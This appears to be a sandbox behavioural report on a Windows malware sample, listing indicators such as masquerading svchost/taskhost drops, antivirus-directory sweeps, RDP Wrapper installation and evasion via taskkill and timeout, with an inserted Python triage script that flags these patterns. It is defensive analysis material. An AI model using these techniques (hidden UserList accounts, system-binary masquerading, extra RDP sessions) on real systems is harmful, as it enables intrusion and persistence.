File opened for modification C:\Program Files\360\Total Security C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\NetworkDistribution C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\java.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\java.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\boy.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\boy.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\svchost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\svchost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows\rfusclient.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\programdata\microsoft\intel\R8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
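
Added example, not part of the sandbox report and not code from the sample: a Python triage pass over rows in the flattened "Description Indicator Process Target" layout this report uses, written for this edit. It covers the SpecialAccounts\UserList writes, the Program Files and Windows directory drops, the NetSh key accesses and the NTFS ADS rows above; the embedded sample rows are copied from those tables, while the canonical-directory list, the five-directory threshold for calling something a Program Files sweep and the finding names are assumptions made for the example. The checks are the ones an analyst would apply by hand. A UserList value of 0 hides that account from the logon screen, but HKLM\SOFTWARE is registry-redirected for 32-bit processes, so the WOW6432Node copies written by SysWOW64\reg.exe and regedit.exe are not the key the 64-bit logon UI reads; the native-path write by LtHv0O2KZDK4M637.exe is. A svchost.exe created in C:\Windows rather than System32, and a taskhost.exe running from C:\ProgramData, borrow system binary names. RDPWInst.exe writing rdpwrap.dll under C:\Program Files\RDP Wrapper is an RDP Wrapper install, which enables additional RDP sessions. The NetSh rows are only reads of the helper list, which netsh.exe performs on every invocation; without a write to that key they are not evidence of a registered helper DLL. And winmgmts:\localhost\root\CIMV2 is a WMI moniker that the sandbox recorded as a path relative to the process directory; the colon is what trips the ADS heuristic, which is an interpretation of the row rather than something it states.

```python
"""Triage of flattened sandbox signature rows (added example written for this
edit; only the sample rows are copied from the report)."""
import re
from collections import defaultdict

# Constructed sample: representative rows in the report's flattened
# "Description Indicator Process Target" layout.
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\svchost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\java.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A
"""

DESCRIPTIONS = sorted(
    ["Set value (int)", "Set value (str)", "File created", "File opened for modification",
     "Key opened", "Key queried", "Key created", "Key value enumerated", "Key value queried"],
    key=len, reverse=True)
DRIVE_PATH = re.compile(r" (?=[A-Za-z]:\\)")   # a space followed by "X:\" starts a new path column
HIDDEN_USER = re.compile(r'\\Winlogon\\SpecialAccounts\\UserList\\([^\\]+) = "0"$', re.I)
# Canonical homes of commonly borrowed system binary names (assumption: short list for this sample).
CANONICAL = {"svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
             "taskhost.exe": {r"c:\windows\system32"}, "taskhostw.exe": {r"c:\windows\system32"}}
SWEEP_THRESHOLD = 5   # assumption: distinct Program Files directories one process opens before it counts as a sweep


def parse_row(line):
    """Split one flattened row into its four columns, or return None.

    Boundaries come from the fixed description vocabulary and from the drive
    letter every Process/Target path starts with; an indicator that embeds a
    quoted "C:\\..." value would need a stricter parser."""
    line = line.strip()
    desc = next((d for d in DESCRIPTIONS if line.startswith(d + " ")), None)
    if desc is None:
        return None
    rest, target = line[len(desc) + 1:], None
    if rest.endswith(" N/A"):
        rest = rest[:-4]
    else:
        *head, target = DRIVE_PATH.split(rest)
        rest = " ".join(head)
    *head, process = DRIVE_PATH.split(rest)
    if not head:
        return None
    return {"desc": desc, "indicator": " ".join(head), "process": process, "target": target}


def _dir(path):
    return path.rsplit("\\", 1)[0].lower()


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(rows):
    """Return an ordered, de-duplicated list of (kind, message) findings."""
    findings, sweep, netsh_written = [], defaultdict(set), False

    def add(kind, msg):
        if (kind, msg) not in findings:
            findings.append((kind, msg))

    for r in filter(None, map(parse_row, rows)):
        desc, ind, proc = r["desc"], r["indicator"], r["process"]
        m = HIDDEN_USER.search(ind)
        if m and desc.startswith("Set value"):
            # HKLM\SOFTWARE is redirected for 32-bit writers; the 64-bit logon UI reads the native key.
            view = ("WOW6432Node view, ignored by the 64-bit logon UI" if "\\WOW6432Node\\" in ind
                    else "native key: account hidden from the logon screen")
            add("hidden-account", f"{proc} sets UserList\\{m.group(1)}=0 ({view})")
        for path in (ind, proc):                      # the dropped file and the actor can both masquerade
            canon = CANONICAL.get(_base(path))
            if canon and _dir(path) not in canon:
                add("masquerade", f"{path} borrows a system binary name outside {sorted(canon)}")
        if "\\rdp wrapper\\" in ind.lower():
            add("rdp-wrapper", f"{proc} -> {ind} (RDP Wrapper enables extra RDP sessions)")
        if re.search(r"\\winmgmts:", ind, re.I):      # a WMI moniker, not an NTFS alternate data stream
            add("wmi-moniker", f"{proc} passed WMI moniker {ind}; the colon trips the ADS heuristic")
        if desc == "File opened for modification" and ind.lower().startswith("c:\\program files") \
                and "." not in _base(ind):
            sweep[proc].add(ind)
        if "\\microsoft\\netsh" in ind.lower() and (desc.startswith("Set value") or desc == "Key created"):
            netsh_written = True
    for proc, dirs in sweep.items():
        if len(dirs) >= SWEEP_THRESHOLD:
            add("security-software-discovery", f"{proc} opened {len(dirs)} Program Files vendor directories")
    add("netsh-helper", "helper DLL registered under HKLM\\SOFTWARE\\Microsoft\\NetSh" if netsh_written
        else "netsh only read its helper list, which every netsh invocation does")
    return findings


if __name__ == "__main__":
    for kind, msg in triage(SAMPLE_ROWS.splitlines()):
        print(f"[{kind}] {msg}")
```

Run it as a script to print the findings for the embedded rows, or feed it any other rows from this report. The parser depends on every Process and Target column starting with a drive letter, which holds for every row on this page; the threshold and the canonical-directory table are the two knobs to tune for other reports.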

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
